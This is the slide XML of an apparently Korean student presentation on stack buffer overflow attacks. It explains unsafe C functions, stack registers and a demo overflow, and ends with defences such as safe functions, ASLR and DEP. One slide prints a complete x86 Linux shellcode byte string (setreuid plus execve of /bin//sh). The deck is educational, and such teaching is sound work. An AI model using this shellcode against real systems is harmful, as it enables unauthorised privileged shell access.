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6" r:id="rId3"/>
    <p:sldId id="269" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="26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3CC54E-31D8-499F-8442-F16263DA9D32}" v="86" dt="2018-12-21T03:16:27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96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FBCB9-1E85-455E-9765-4BB6593A5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FF0FE-81FB-4F7E-A5A1-6F0F7A2A1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46B6C-B432-4CA7-B183-AD55FB77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82C6-75B8-4132-9666-A9537C3AA73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250C3-0DEC-4342-A34F-A8DCF522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173EAB-690F-4E50-A690-CA0EDAFA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2F3-3FDD-4D0C-8D9D-6B128582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98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7168F-008F-440A-9321-27C0A844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8AC661-2A1A-4272-853E-6FB4F91FE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92B3F8-2F53-4271-8A00-FE4150F9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82C6-75B8-4132-9666-A9537C3AA73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96CB-FF3B-494C-91DE-B9BB6914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48675-11F6-42AB-BAB2-5F986E4F9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2F3-3FDD-4D0C-8D9D-6B128582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62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88C182-4DE1-433F-B6AC-A26092A28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28A001-36FF-42AA-93C5-C10F00B75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45800A-C985-47D0-81D2-00005EC7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82C6-75B8-4132-9666-A9537C3AA73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FAB4FF-4753-4FCE-B42B-0A346FEE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39F02-5A08-4667-957A-9BE176A11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2F3-3FDD-4D0C-8D9D-6B128582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23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594E5-FE18-4C2C-AB4C-9B103CA3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D168AE-53F7-412C-AE22-1CDFF8A75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284807-8DDF-4117-A7D6-B6E5162E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82C6-75B8-4132-9666-A9537C3AA73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C290E-5770-4793-A4D9-ED685AD2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AC34C-C183-4D64-963A-357E5CDA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2F3-3FDD-4D0C-8D9D-6B128582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02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B1667-12F5-4A67-804B-BA832E35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BA916-1F6C-4CFF-92B2-BEB323A49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60E79-3C17-4ABC-B208-A29165E5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82C6-75B8-4132-9666-A9537C3AA73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8563E-2443-4EE3-B580-24F5637B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0FF71-96B5-47C1-83FA-24513C5C8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2F3-3FDD-4D0C-8D9D-6B128582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11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C5BEE-44E1-4A41-A1C9-9B9E2D48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3A1E0-351A-4646-A8F7-821DDCF3E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F61CA3-AE9B-42F0-883C-DDACAF82C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25301E-37CB-402A-AE0F-45152326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82C6-75B8-4132-9666-A9537C3AA73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C10D5E-57DA-440B-B14B-D9D0AE0E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2E7272-B0FA-4E20-A39E-C55AF8AB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2F3-3FDD-4D0C-8D9D-6B128582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573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6AE90-EC4A-4E21-9DD0-3EAF6E29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98584C-73C5-47CA-A510-0C040D40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9F733C-3041-445E-A141-00CD361F4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248016-605A-4186-AF6C-CE4C61EBE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CA2634-AEF3-4653-8176-FB07F6B66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ED25C3-FC04-4F7F-A66A-BCBF5F87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82C6-75B8-4132-9666-A9537C3AA73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D8A5D4-9ED2-4F5C-AF84-8DC13139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F2CB6F-EABE-4672-B068-C48B7118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2F3-3FDD-4D0C-8D9D-6B128582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224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BACB1-7755-4175-A779-243E209D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D98100-E43D-403A-8253-D9C6A4EE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82C6-75B8-4132-9666-A9537C3AA73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ABAD4D-46C3-48CE-ADC1-19EAE4906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30C385-A6BC-4A8B-BD71-A3D33436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2F3-3FDD-4D0C-8D9D-6B128582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50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B8C303-E2F2-4317-ACB9-C62887A5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82C6-75B8-4132-9666-A9537C3AA73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C269A0-71D1-4E67-B777-897AF1EF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34A8CB-E3DF-4C3E-AAB2-53BEA374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2F3-3FDD-4D0C-8D9D-6B128582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29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7FBC8-11CB-4D51-B9AA-814142EDB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9D02E6-9A49-4CD3-B7F1-24EF6C084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0EB724-E38D-4FA3-9375-AB98C6239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3714CE-AC60-4C98-B788-D8A310AEF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82C6-75B8-4132-9666-A9537C3AA73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FBCBB4-293A-44C4-8AD7-13600A0F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E3590-B2DA-48CC-A665-00D8E83D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2F3-3FDD-4D0C-8D9D-6B128582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93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E788B-2FAD-4B50-B4B6-021090ED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F5DEC7-93AF-4397-9C60-7ACA6DA38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1E3C9D-6668-443E-9AB5-ACCACC0A9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D5C66A-1DFA-4363-A272-2F91BE50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82C6-75B8-4132-9666-A9537C3AA73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9A5239-4751-48F8-91DA-F4742C8B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8826C0-68DE-4B5C-871F-5E4C8D26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52F3-3FDD-4D0C-8D9D-6B128582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88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ECB82D-77BF-4FA9-8A51-9D4B8462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F17650-DB8D-4B04-AF74-CE5FAA157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AE8C12-DB4F-4E04-A07C-374587815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282C6-75B8-4132-9666-A9537C3AA736}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2018-12-21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8E693-D120-4154-B53F-98D2993BB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34EBCA-91E9-4915-89F3-22CEBB417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552F3-3FDD-4D0C-8D9D-6B128582F6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78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1D2751-344E-4754-BCC2-1A8309E10C0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847372" y="1157243"/>
            <a:ext cx="6597570" cy="394935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F5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28" y="2143468"/>
            <a:ext cx="548243" cy="54824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54946" y="2773968"/>
            <a:ext cx="3500581" cy="722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accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BufferOverFlow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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447309" y="2524361"/>
            <a:ext cx="32973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209473" y="3804092"/>
            <a:ext cx="291759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3350766" y="4293986"/>
            <a:ext cx="5490468" cy="420547"/>
            <a:chOff x="3548743" y="4565110"/>
            <a:chExt cx="5490468" cy="420547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="평행 사변형 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3548743" y="4565110"/>
              <a:ext cx="5490468" cy="420547"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 664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80524" y="4590717"/>
              <a:ext cx="1845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1294051 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0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김경호</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR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8F251055-4158-4BCE-B8A3-A37EDB566F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7933" y="2819346"/>
            <a:ext cx="476812" cy="6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90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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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1CF86-4C99-4736-ACAC-640887DD4F53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="497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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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BufferOverFlow</a:t>
            </a:r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공격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F658A1-6B2C-4D37-BA00-80A5D8A16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96" y="1014208"/>
            <a:ext cx="5096486" cy="52550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48FA88-31F3-44AE-9C45-8F975BC81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936" y="1109953"/>
            <a:ext cx="2994823" cy="48772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A4B73B-EFD8-415D-8EDC-CB175E77C84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8914671" y="2356862"/>
            <a:ext cx="3277329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buffer[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390508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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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9822EC-7B7B-417A-A950-1ACB4717C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15" y="1162449"/>
            <a:ext cx="10467975" cy="1009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FCC2D0B-15E5-489B-A325-C89EE2F91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15" y="2384838"/>
            <a:ext cx="7124700" cy="3609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8FE57D-ADEE-4609-8DCA-F38FC0C100F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7963656" y="3467442"/>
            <a:ext cx="327732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Buffer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의 시작 주소 값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0xbffff908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334FBA-D11F-45CB-BC2D-65BE421D00BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="497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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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BufferOverFlow</a:t>
            </a:r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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327009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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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EE16006-46FD-48E7-8713-BA1B7E9EC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95" y="1119139"/>
            <a:ext cx="10439400" cy="26384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8EE6CD4-9C62-4A88-87F7-104322645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95" y="3755428"/>
            <a:ext cx="5667375" cy="2667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2D42CB-678F-4C3D-AEBD-113367BC0EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7384815" y="4323119"/>
            <a:ext cx="327732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0x4b4b4b4b(KKKK)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로 분기 시도 후 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Seg fault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72514A-1583-4A8C-AB6B-21FD67251CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="497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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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BufferOverFlow</a:t>
            </a:r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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3189955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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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FE57D-ADEE-4609-8DCA-F38FC0C100F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7963656" y="3467442"/>
            <a:ext cx="3277329" cy="1128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Buffer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의 시작 주소 값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0xbffff908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988AEC-D0C4-476D-9C77-239D58E30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85" y="1309376"/>
            <a:ext cx="10553700" cy="48309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3C2697-B33B-4465-8BA9-5B011110B2FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="4977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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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BufferOverFlow</a:t>
            </a:r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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373792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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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9EE689-FBFF-453A-8011-019F7316F1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127323" y="205966"/>
            <a:ext cx="2710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5.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대처 방안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98132B-78EE-4725-B387-62E59057CC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311442" y="1571856"/>
            <a:ext cx="10190747" cy="445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안전한 라이브러리 함수 사용 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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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scanf_s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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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strncpy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(), etc..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 ASLR( Address Space Layout Randomization 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-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메모리에 로딩될 때 주소를 랜덤으로 변환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 DEP( Data Execution Prevention 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-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실행 방지 메모리 영역 지정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0627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28" y="2143468"/>
            <a:ext cx="548243" cy="54824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354946" y="2773968"/>
            <a:ext cx="3500581" cy="722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/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7382" y="2974270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THANK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YOU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4421178" y="2638661"/>
            <a:ext cx="3297382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184073" y="3677092"/>
            <a:ext cx="291759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3350766" y="4293986"/>
            <a:ext cx="5490468" cy="420547"/>
            <a:chOff x="3548743" y="4565110"/>
            <a:chExt cx="5490468" cy="420547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="평행 사변형 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3548743" y="4565110"/>
              <a:ext cx="5490468" cy="420547"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 66415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62234" y="4590717"/>
              <a:ext cx="235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들어주셔서</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0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 감사합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="나눔바른고딕 Light" panose="020B0603020101020101" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔바른고딕 Light" panose="020B0603020101020101" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US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45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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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9EE689-FBFF-453A-8011-019F7316F1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="1269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목 차</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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3BF4C8-892A-4CC1-906A-6F5BF5080021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169566" y="1045121"/>
            <a:ext cx="5128590" cy="500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BufferOverFlow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란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프로그램의 기본 구조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Shell code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작성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4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BufforOverFlow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공격 시연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결과 및 대처 방안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826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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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9EE689-FBFF-453A-8011-019F7316F1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="3892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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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BufferOverFlow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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935FDD-22D6-4458-BAD1-6E175B1C2441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1571856"/>
            <a:ext cx="10190747" cy="399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BufferOverFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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scanf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gets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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strcpy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등 취약점이 존재하는 함수를 사용하는 프로그램을 이용하여 시스템에 피해를 주는 해킹 기법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현재는 안전한 라이브러리 함수를 사용 및 시스템 내부에서 다양한 보안 기술의 발전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(ASLR, DEP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등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으로 잘 사용되지 않음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652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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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9EE689-FBFF-453A-8011-019F7316F1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="5181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프로그램의 기본 구조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F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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91172F-F2E6-46D1-9A9F-3D4665F00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12" y="1462087"/>
            <a:ext cx="5629275" cy="3933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3BF4C8-892A-4CC1-906A-6F5BF5080021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743700" y="1589292"/>
            <a:ext cx="5128590" cy="3806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Stack –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지역 변수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함수 리턴 주소 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1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10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Heap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–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동적 메모리 할당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 –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전역 변수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정적 변수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Text –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코드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773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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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6DCE10-45F1-4055-916C-B8C753160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55" y="1281112"/>
            <a:ext cx="5064602" cy="42715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0B5DF6-AD4D-4AE7-9A58-8AD6AB541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81111"/>
            <a:ext cx="5029200" cy="42715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785DD3-84E9-4CA7-AEDE-6F387985D11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="6548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프로그램의 기본 구조</a:t>
            </a:r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(Stack)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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2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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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ADDA59-C4D5-4835-A5F8-4BC384547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104851"/>
            <a:ext cx="2994823" cy="48772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F11A14-3500-4C90-94FE-7C203171E814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4849456" y="1104851"/>
            <a:ext cx="6999813" cy="4960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EBP(Extended Base Pointer)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현재 스택에서 가장 바닥을 가리키는 포인터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함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="24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호출시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새로운 값 저장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ESP(Extended Stack Pointer)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프로그램의 스택 포인터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EIP(Extended Instruction Pointer)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함수 호출이 끝난 뒤 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CPU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가 실행해야 하는 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code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의 주소 가리키는 포인터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5491D6-6B71-44F8-AE61-145DDF58EFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="6548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프로그램의 기본 구조</a:t>
            </a:r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(Stack)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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290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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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567F46-C6C6-420F-AFE7-498DBE880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61" y="1014209"/>
            <a:ext cx="5412765" cy="47930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65DB7C-523B-442F-8394-CC59C7619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52222"/>
            <a:ext cx="4981575" cy="302866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647403-3A97-42A5-B5F2-921A3CE6E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4751734"/>
            <a:ext cx="2679032" cy="8540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6B6149-B7F3-465A-A856-FA7851BE8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1708" y="4529157"/>
            <a:ext cx="2809704" cy="13312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BCA3DB-3E3A-4BEE-AD29-7BAB34199C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="6548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2.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프로그램의 기본 구조</a:t>
            </a:r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(Stack)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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769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0" y="863187"/>
            <a:ext cx="1079862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95400" y="6420292"/>
            <a:ext cx="108966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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="3363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61CF86-4C99-4736-ACAC-640887DD4F53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856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Shell Code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작성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B78D5B-A5EF-4306-B266-CD5DBAE4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72" y="1057422"/>
            <a:ext cx="4794870" cy="47177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43C3CC-EC48-4A01-B3FE-B63E08819813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197642" y="1414453"/>
            <a:ext cx="6591586" cy="3898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setreuid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() –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유효 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ID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를 설정한다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geteuid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() –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실행된 파일 설정된 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SID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값 반환</a:t>
            </a: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execve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() –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실행 함수 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(/bash/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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sh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프로그램 실행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070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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="863187"/>
            <a:ext cx="10798629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295400" y="6420292"/>
            <a:ext cx="1089660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985" y="465966"/>
            <a:ext cx="548243" cy="5482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95F505C-96FC-4B2E-9316-54C7CE0CD74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687746" y="33639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62051B8-779D-4F68-8D7F-3356A356B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70" y="1059920"/>
            <a:ext cx="3507205" cy="49805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9A8B4D-6BE9-488F-ACBB-D654DDD78CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197642" y="1414453"/>
            <a:ext cx="6591586" cy="3991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Objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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명령어를 이용해 추출한 </a:t>
            </a:r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Shell Code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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>"\x31\xc0\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>\x31\xc9\x31\xd2\xb0\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x52\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>\x80“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
